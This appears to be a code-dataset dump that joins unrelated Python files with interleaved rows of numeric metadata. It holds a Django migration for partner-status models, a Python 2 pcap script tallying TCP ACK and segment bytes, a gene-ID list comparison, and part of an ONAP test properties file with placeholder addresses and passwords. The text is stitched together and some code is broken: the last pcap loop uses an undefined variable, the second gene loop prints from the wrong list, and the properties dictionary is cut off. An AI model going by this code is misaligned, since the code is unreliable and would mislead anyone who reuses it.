import simple_history.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('projects', '0012_engagementactivitytype_historicalengagementactivitytype_historicalprojectengagementactivity_projecte'),
('partners', '0004_auto_20190420_1044'),
]
operations = [
migrations.CreateModel(
name='CecPartnerStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
('description', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'verbose_name': 'CEC Partner Status',
'verbose_name_plural': 'CEC Partner Statuses',
},
),
migrations.CreateModel(
name='PartnerStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
('description', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'verbose_name': 'Partner Status',
'verbose_name_plural': 'Partner Statuses',
},
),
migrations.AddField(
model_name='communitypartner',
name='acronym',
field=models.CharField(blank=True, max_length=255, null=True, unique=True),
),
migrations.AddField(
model_name='communitypartner',
name='online_only',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='acronym',
field=models.CharField(blank=True, db_index=True, max_length=255, null=True),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='online_only',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='communitypartner',
name='address_line1',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='address_line2',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='city',
field=models.CharField(blank=True, max_length=25, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='country',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='county',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='state',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='zip',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='address_line1',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='address_line2',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='city',
field=models.CharField(blank=True, max_length=25, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='country',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='county',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='state',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='zip',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.CreateModel(
name='HistoricalPartnerStatus',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=80)),
('description', models.CharField(blank=True, max_length=255, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Partner Status',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalCecPartnerStatus',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=80)),
('description', models.CharField(blank=True, max_length=255, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical CEC Partner Status',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalCecPartActiveYrs',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('start_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('end_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('camp_partner', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CampusPartner')),
('comm_partner', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CommunityPartner')),
('end_acad_year', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='projects.AcademicYear')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('start_acad_year', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='projects.AcademicYear')),
],
options={
'verbose_name': 'historical CEC Building Partner Active Year',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='CecPartActiveYrs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('end_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('camp_partner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CampusPartner')),
('comm_partner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CommunityPartner')),
('end_acad_year', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cec_academic_year2', to='projects.AcademicYear')),
('start_acad_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cec_academic_year1', to='projects.AcademicYear')),
],
options={
'verbose_name': 'CEC Building Partner Active Year',
'verbose_name_plural': 'CEC Building Partner Active Year',
},
),
migrations.AddField(
model_name='campuspartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CecPartnerStatus', verbose_name='Campus CEC Partner Status'),
),
migrations.AddField(
model_name='campuspartner',
name='partner_status',
field=models.ForeignKey(max_length=30, null=True, on_delete=django.db.models.deletion.SET_NULL, to='partners.PartnerStatus', verbose_name='Campus Partner Status'),
),
migrations.AddField(
model_name='communitypartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='partners.CecPartnerStatus', verbose_name='Community CEC Partner Status'),
),
migrations.AddField(
model_name='communitypartner',
name='partner_status',
field=models.ForeignKey(max_length=30, null=True, on_delete=django.db.models.deletion.SET_NULL, to='partners.PartnerStatus', verbose_name='Community Partner Status'),
),
migrations.AddField(
model_name='historicalcampuspartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CecPartnerStatus', verbose_name='Campus CEC Partner Status'),
),
migrations.AddField(
model_name='historicalcampuspartner',
name='partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, max_length=30, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.PartnerStatus', verbose_name='Campus Partner Status'),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='cec_partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CecPartnerStatus', verbose_name='Community CEC Partner Status'),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='partner_status',
field=models.ForeignKey(blank=True, db_constraint=False, max_length=30, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.PartnerStatus', verbose_name='Community Partner Status'),
),
]
| 54.668
| 231
| 0.612863
| 1,351
| 13,667
| 6.013323
| 0.105107
| 0.040374
| 0.059084
| 0.070901
| 0.917898
| 0.893033
| 0.853028
| 0.841827
| 0.806745
| 0.77708
| 0
| 0.013104
| 0.246214
| 13,667
| 249
| 232
| 54.88755
| 0.77548
| 0.003293
| 0
| 0.790123
| 1
| 0
| 0.211674
| 0.070778
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016461
| 0
| 0.028807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
561935427c27ae30579fecbb246c47173f787c12
| 2,963
|
py
|
Python
|
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | 6
|
2018-02-02T19:07:49.000Z
|
2021-09-05T12:17:20.000Z
|
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | null | null | null |
Networks Lab-04/Scripts-Data-Graphs/CodesToGenerateData/tcp_ack_seg.py
|
hareeshreddi/Computer-Networks-Lab-Assignments
|
c86665a4fb673fd53b636f552e02e6d06c94ba22
|
[
"MIT"
] | 14
|
2019-01-09T14:05:36.000Z
|
2021-02-01T09:07:18.000Z
|
import sys
import dpkt
import struct
import socket
l = ['0','256','512','1000']
i=0
out=open('tcp_ack_ap.txt','w')
out1=open('tcp_seg_ap.txt','w')
while i < len(l):
ele1=l[i]
filename = 'assignment-4-data/'+ele1+'/AccessPoint-1-0.pcap'
f = open(filename)
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error as e:
zz =1
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele1+' '+str(x1)+'\n')
out1.write(ele1+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
out=open('tcp_ack_sta1.txt','w')
out1=open('tcp_seg_sta1.txt','w')
i = 0
while i < len(l):
ele2=l[i]
filename = 'assignment-4-data/'+ele2+'/Station-0-0.pcap'
f = open(filename)
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error as e:
zz =1
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele2+' '+str(x1)+'\n')
out1.write(ele2+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
out=open('tcp_ack_sta2.txt','w')
out1=open('tcp_seg_sta2.txt','w')
i = 0
while i < len(l):
ele3=l[i]
filename = 'assignment-4-data/'+ele3+'/Station-2-0.pcap'
f = open(filename)
print f
pcap=dpkt.pcap.Reader(f)
frame_tcp_ack=0
frame_tcp_seg=0
frame_tcp_Ack_total=0
frame_tcp_seg_total=0
if 1 :
for ts,data in pcap:
buf_radiotap=dpkt.radiotap.Radiotap(data)
buf_radiotap_len=socket.ntohs(buf_radiotap.length)
wlan=dpkt.ieee80211.IEEE80211(data[buf_radiotap_len:])
try:
tcp=dpkt.tcp.TCP(wlan.data)
if(tcp.flags & dpkt.tcp.TH_ACK) != 0:
#print("a")
frame_tcp_ack += 1
frame_tcp_Ack_total += len(data)
if len(tcp.data) >0 :
frame_tcp_seg += 1
frame_tcp_seg_total += len(data)
except dpkt.Error as e:
zz =1
x1 = (frame_tcp_Ack_total*8.00)/(1024*1024*50)
x2 = (frame_tcp_seg_total*8.00)/(1024*1024*50)
out.write(ele+' '+str(x1)+'\n')
out1.write(ele+' '+str(x2)+'\n')
i += 1
out.close()
out1.close()
| 22.44697
| 61
| 0.669929
| 537
| 2,963
| 3.489758
| 0.132216
| 0.128068
| 0.088047
| 0.057631
| 0.901814
| 0.877801
| 0.808965
| 0.808965
| 0.791889
| 0.778549
| 0
| 0.079824
| 0.158623
| 2,963
| 132
| 62
| 22.44697
| 0.671881
| 0.003375
| 0
| 0.790909
| 0
| 0
| 0.079919
| 0.007111
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.036364
| null | null | 0.027273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
564ea568b5cdb7312f18c45d273886d4bc9cdcbf
| 5,926
|
py
|
Python
|
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
assignments/hw4/codes/hw4a/gene_comp.py
|
sowmyamanojna/BT5240-Computational-Systems-Biology
|
fe7562de26991cd096c2d27603e85a2408f71752
|
[
"MIT"
] | null | null | null |
gal_sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0740', 'HP1052', 'HP0777']
glu_sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP0646', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0360', 'HP0740', 'HP1052', 'HP0777']
sgd = ['HP0370', 'HP0950', 'HP0371', 'HP0557', 'HP0202', 'HP0587', 'HP0618', 'HP1112', 'HP0255', 'HP0859', 'HP0089', 'HP0106', 'HP0738', 'HP0942', 'HP0976', 'HP1483', 'HP1280', 'HP1281', 'HP1282', 'HP0598', 'HP1505', 'HP0422', 'HP1399', 'HP1017', 'HP1189', 'HP0723', 'HP0034', 'HP1084', 'HP1229', 'HP0672', 'HP1539', 'HP1227', 'HP1538', 'HP1540', 'HP1406', 'HP1376', 'HP0558', 'HP0195', 'HP0561', 'HP1237', 'HP0919', 'HP1443', 'HP0291', 'HP0663', 'HP0349', 'HP0147', 'HP0144', 'HP0145', 'HP0146', 'HP0107', 'HP0290', 'HP0566', 'HP0215', 'HP0804', 'HP0029', 'HP0134', 'HP0321', 'HP0510', 'HP1013', 'HP1545', 'HP1510', 'HP1011', 'HP0266', 'HP0581', 'HP1232', 'HP1038', 'HP0283', 'HP0929', 'HP0400', 'HP1228', 'HP0831', 'HP1474', 'HP0216', 'HP0354', 'HP0154', 'HP0176', 'HP1385', 'HP0642', 'HP1161', 'HP1087', 'HP0577', 'HP0683', 'HP0961', 'HP0646', 'HP1532', 'HP0045', 'HP0183', 'HP0512', 'HP1491', 'HP0549', 'HP0509', 'HP0044', 'HP0858', 'HP0860', 'HP0409', 'HP0928', 'HP0802', 'HP1158', 'HP0822', 'HP1050', 'HP1279', 'HP1468', 'HP1275', 'HP0829', 'HP0230', 'HP0003', 'HP0867', 'HP0279', 'HP0043', 'HP0090', 'HP0086', 'HP0625', 'HP1020', 'HP0197', 'HP0957', 'HP1058', 'HP1394', 'HP0329', 'HP0198', 'HP1337', 'HP1355', 'HP0240', 'HP0005', 'HP0588', 'HP0590', 'HP0589', 'HP0591', 'HP1257', 'HP0293', 'HP0006', 'HP0493', 'HP1348', 'HP1111', 'HP1109', 'HP1108', 'HP1110', 'HP0075', 'HP0096', 'HP0397', 'HP1166', 'HP1345', 'HP0974', 'HP0737', 'HP1016', 'HP0620', 'HP1380', 'HP0121', 'HP1218', 'HP0742', 'HP0401', 'HP1357', 'HP0736', 'HP0652', 'HP1071', 'HP1475', 'HP1356', 'HP0002', 'HP1574', 'HP0105', 'HP0680', 'HP0364', 'HP0574', 'HP0857', 'HP0212', 'HP0624', 'HP1210', 'HP1249', 'HP0157', 'HP0832', 'HP0389', 'HP0626', 'HP0098', 'HP1088', 'HP1533', 'HP0194', 'HP1458', 'HP0825', 'HP0824', 'HP1164', 'HP1277', 'HP1278', 'HP0196', 'HP1494', 'HP1375', 'HP0648', 'HP1155', 'HP0494', 'HP0623', 'HP1418', 'HP0360', 'HP0740', 'HP1052', 'HP0777']
m = len(glu_sgd)
n = len(gal_sgd)
w = len(sgd)
# Glucose and galactose comparision
print("\nGlucose and galactose comparision mismatch")
i = j = 0
while i < m and j < n:
if glu_sgd[i] != gal_sgd[j]:
print(glu_sgd[i])
i += 1
else:
i += 1
j += 1
# WT and Glucose comparision
print("\nWT and Glucose comparision mismatch")
i = j = 0
while i < w and j < m:
if sgd[i] != glu_sgd[j]:
print(glu_sgd[i])
i += 1
else:
i += 1
j += 1
| 191.16129
| 1,936
| 0.600405
| 634
| 5,926
| 5.597792
| 0.340694
| 0.010144
| 0.01268
| 0.017751
| 0.915469
| 0.915469
| 0.915469
| 0.89969
| 0.89969
| 0.89969
| 0
| 0.415496
| 0.111374
| 5,926
| 30
| 1,937
| 197.533333
| 0.25845
| 0.010125
| 0
| 0.5
| 0
| 0
| 0.57155
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5657e77a52d02570cfa7d84d7e805ca65861e372
| 3,775
|
py
|
Python
|
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
sample_vm_properties.py
|
onapdemo/testsuite-properties
|
daae856bbb5bf2b21812f764113088180de5016e
|
[
"Apache-2.0"
] | null | null | null |
# This is not for real use!
# This is normally generated by the build and install so should not be used for anything or filled in with real values.
# File generated from /opt/config
#
GLOBAL_INJECTED_AAI1_IP_ADDR = "10.0.1.1"
GLOBAL_INJECTED_AAI2_IP_ADDR = "10.0.1.2"
GLOBAL_INJECTED_APPC_IP_ADDR = "10.0.2.1"
GLOBAL_INJECTED_ARTIFACTS_VERSION = "1.2.0"
GLOBAL_INJECTED_CLAMP_IP_ADDR = "10.0.12.1"
GLOBAL_INJECTED_CLOUD_ENV = "openstack"
GLOBAL_INJECTED_DCAE_IP_ADDR = "10.0.4.1"
GLOBAL_INJECTED_DNS_IP_ADDR = "10.0.100.1"
GLOBAL_INJECTED_DOCKER_VERSION = "1.1-STAGING-latest"
GLOBAL_INJECTED_EXTERNAL_DNS = "8.8.8.8"
GLOBAL_INJECTED_GERRIT_BRANCH = "amsterdam"
GLOBAL_INJECTED_KEYSTONE = "http://10.12.25.2:5000"
GLOBAL_INJECTED_MR_IP_ADDR = "10.0.11.1"
GLOBAL_INJECTED_MSO_IP_ADDR = "10.0.5.1"
GLOBAL_INJECTED_NETWORK = "oam_onap_wbaL"
GLOBAL_INJECTED_NEXUS_DOCKER_REPO = "10.12.5.2:5000"
GLOBAL_INJECTED_NEXUS_PASSWORD = "anonymous"
GLOBAL_INJECTED_NEXUS_REPO = "https://nexus.onap.org/content/sites/raw"
GLOBAL_INJECTED_NEXUS_USERNAME = "username"
GLOBAL_INJECTED_OPENO_IP_ADDR = "10.0.14.1"
GLOBAL_INJECTED_OPENSTACK_PASSWORD = "password"
GLOBAL_INJECTED_OPENSTACK_TENANT_ID = "000007144004bacac1e39ff23105fff"
GLOBAL_INJECTED_OPENSTACK_USERNAME = "username"
GLOBAL_INJECTED_POLICY_IP_ADDR = "10.0.6.1"
GLOBAL_INJECTED_PORTAL_IP_ADDR = "10.0.9.1"
GLOBAL_INJECTED_PUBLIC_NET_ID = "971040b2-7059-49dc-b220-4fab50cb2ad4"
GLOBAL_INJECTED_REGION = "RegionOne"
GLOBAL_INJECTED_REMOTE_REPO = "http://gerrit.onap.org/r/testsuite/properties.git"
GLOBAL_INJECTED_SCRIPT_VERSION = "1.1.1"
GLOBAL_INJECTED_SDC_IP_ADDR = "10.0.3.1"
GLOBAL_INJECTED_SDNC_IP_ADDR = "10.0.7.1"
GLOBAL_INJECTED_SO_IP_ADDR = "10.0.5.1"
GLOBAL_INJECTED_VID_IP_ADDR = "10.0.8.1"
GLOBAL_INJECTED_VM_FLAVOR = "m1.medium"
GLOBAL_INJECTED_UBUNTU_1404_IMAGE = "ubuntu-14-04-cloud-amd64"
GLOBAL_INJECTED_UBUNTU_1604_IMAGE = "ubuntu-16-04-cloud-amd64"
GLOBAL_INJECTED_PROPERTIES={
"GLOBAL_INJECTED_AAI1_IP_ADDR" : "10.0.1.1",
"GLOBAL_INJECTED_AAI2_IP_ADDR" : "10.0.1.2",
"GLOBAL_INJECTED_APPC_IP_ADDR" : "10.0.2.1",
"GLOBAL_INJECTED_ARTIFACTS_VERSION" : "1.2.0",
"GLOBAL_INJECTED_CLAMP_IP_ADDR" : "10.0.12.1",
"GLOBAL_INJECTED_CLOUD_ENV" : "openstack",
"GLOBAL_INJECTED_DCAE_IP_ADDR" : "10.0.4.1",
"GLOBAL_INJECTED_DNS_IP_ADDR" : "10.0.100.1",
"GLOBAL_INJECTED_DOCKER_VERSION" : "1.1-STAGING-latest",
"GLOBAL_INJECTED_EXTERNAL_DNS" : "8.8.8.8",
"GLOBAL_INJECTED_GERRIT_BRANCH" : "amsterdam",
"GLOBAL_INJECTED_KEYSTONE" : "http://10.12.25.2:5000",
"GLOBAL_INJECTED_MR_IP_ADDR" : "10.0.11.1",
"GLOBAL_INJECTED_MSO_IP_ADDR" : "10.0.5.1",
"GLOBAL_INJECTED_NETWORK" : "oam_onap_wbaL",
"GLOBAL_INJECTED_NEXUS_DOCKER_REPO" : "10.12.5.2:5000",
"GLOBAL_INJECTED_NEXUS_PASSWORD" : "username",
"GLOBAL_INJECTED_NEXUS_REPO" : "https://nexus.onap.org/content/sites/raw",
"GLOBAL_INJECTED_NEXUS_USERNAME" : "username",
"GLOBAL_INJECTED_OPENO_IP_ADDR" : "10.0.14.1",
"GLOBAL_INJECTED_OPENSTACK_PASSWORD" : "password",
"GLOBAL_INJECTED_OPENSTACK_TENANT_ID" : "000007144004bacac1e39ff23105fff",
"GLOBAL_INJECTED_OPENSTACK_USERNAME" : "demo",
"GLOBAL_INJECTED_POLICY_IP_ADDR" : "10.0.6.1",
